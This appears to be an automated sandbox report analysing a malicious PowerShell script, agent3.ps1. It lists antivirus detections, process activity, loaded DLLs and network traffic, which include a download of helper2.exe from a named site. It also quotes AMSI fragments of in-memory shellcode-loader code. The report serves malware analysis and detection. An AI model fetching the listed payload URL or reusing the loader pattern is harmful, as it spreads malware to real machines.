Edit tour

Windows Analysis Report
agent3.ps1

Overview

General Information

Sample name:	agent3.ps1
Analysis ID:	1394607
MD5:	ccf28e7a27f926a87f8ec739ff1ad84a
SHA1:	de519f7fc4c5834408c2d2834ec0a2c935b320e0
SHA256:	44b1f7c3e3e01e54d2422fce3b9008ad4b17905681bc3d690d6300b0e996fea4
Tags:	mayanboats-comps1
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Found suspicious powershell code related to unpacking or dynamic code loading

AV process strings found (often used to terminate AV products)

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

powershell.exe (PID: 2352 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 5480 cmdline: C:\Windows\system32\WerFault.exe -u -p 2352 -s 2800 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1, CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6792, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1, ProcessId: 2352, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1, CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6792, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1, ProcessId: 2352, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: agent3.ps1

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: https://mayanboats.com/wp-content/uploads/helper2.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: https://mayanboats.com	Virustotal: Detection: 6%			Perma Link
Source: https://mayanboats.com/wp-content/uploads/helper2.exe	Virustotal: Detection: 10%			Perma Link

Multi AV Scanner detection for submitted file

Source: agent3.ps1	ReversingLabs: Detection: 21%
Source: agent3.ps1	Virustotal: Detection: 33%			Perma Link

Source: unknown

HTTPS traffic detected: 185.132.179.211:443 -> 192.168.2.8:49707 version: TLS 1.2

Source:	Binary string: System.Configuration.Install.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Data.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Numerics.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.DirectoryServices.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.Management.Infrastructure.pdb` source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.Install.pdb) source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Xml.pdbP4 source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.Automation.pdb` source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Xml.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.pdb` source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.DirectoryServices.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb6%``%` source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Data.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Xml.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.Automation.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Data.pdbH source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.Automation.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Core.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Transactions.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Transactions.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Numerics.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /wp-content/uploads/helper2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mayanboats.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: unknown

DNS traffic detected: queries for: mayanboats.com

Source: powershell.exe, 00000000.00000002.1594442476.000001E767044000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000000.00000002.1573471547.000001E75034E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mayanboats.com
Source: powershell.exe, 00000000.00000002.1588967177.000001E75ED21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1573471547.000001E7505D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1573471547.000001E74ECB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.1573471547.000001E7505D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1573471547.000001E74ECB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1573471547.000001E7505D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1573471547.000001E750602000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterp
Source: powershell.exe, 00000000.00000002.1573471547.000001E74FED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1573471547.000001E74EED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E7500B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mayanboats.com
Source: powershell.exe, 00000000.00000002.1573471547.000001E7500B7000.00000004.00000800.00020000.00000000.sdmp, agent3.ps1	String found in binary or memory: https://mayanboats.com/wp-content/uploads/helper2.exe
Source: powershell.exe, 00000000.00000002.1588967177.000001E75ED21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown

HTTPS traffic detected: 185.132.179.211:443 -> 192.168.2.8:49707 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2352 -s 2800

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: classification engine

Classification label: mal76.evad.winPS1@3/9@1/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2352

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq1rp4hg.vx1.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: agent3.ps1	ReversingLabs: Detection: 21%
Source: agent3.ps1	Virustotal: Detection: 33%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2352 -s 2800

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Configuration.Install.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Data.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Numerics.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.DirectoryServices.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.Management.Infrastructure.pdb` source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.Install.pdb) source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Xml.pdbP4 source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.Automation.pdb` source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Xml.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.pdb` source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.DirectoryServices.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb6%``%` source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Data.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Xml.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.Automation.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Data.pdbH source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.Automation.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Management.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Core.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Transactions.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Transactions.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Numerics.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERF78C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERF78C.tmp.dmp.5.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($VAAddr, $VADeleg)$CTAddr = GPA kernel32.dll CreateThread$CTDeleg = GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])$CT = $marshal::GetDelegat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($DA, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $MB = $AB.DefineDynamicModule('IMM', $false) $TB = $MB.DefineType('MDT', 'Class, Public, Sealed, AnsiClass, AutoCl

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
